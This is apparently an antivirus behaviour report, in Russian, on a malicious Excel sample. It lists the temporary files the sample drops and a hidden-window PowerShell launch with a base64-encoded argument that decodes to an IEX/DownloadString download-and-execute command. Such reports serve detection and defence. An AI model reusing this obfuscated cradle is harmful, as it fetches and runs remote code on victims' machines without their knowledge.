Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGcAbwBvAGcAbABlAC4AYwBvAG0AJwApADsAbwBhAHcAbgBkAHUAYQB3AGQAbgBuA...
- %TEMP%\1cf3.tmp
- <Текущая директория>\e6721000
- %TEMP%\8170.tmp
- %TEMP%\1cf3.tmp
- %TEMP%\8170.tmp
- <PATH_SAMPLE>.xls
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGcAbwBvAGcAbABlAC4AYwBvAG0AJwApADsAbwBhAHcAbgBkAHUAYQB3AGQAbgBuA... (со скрытым окном)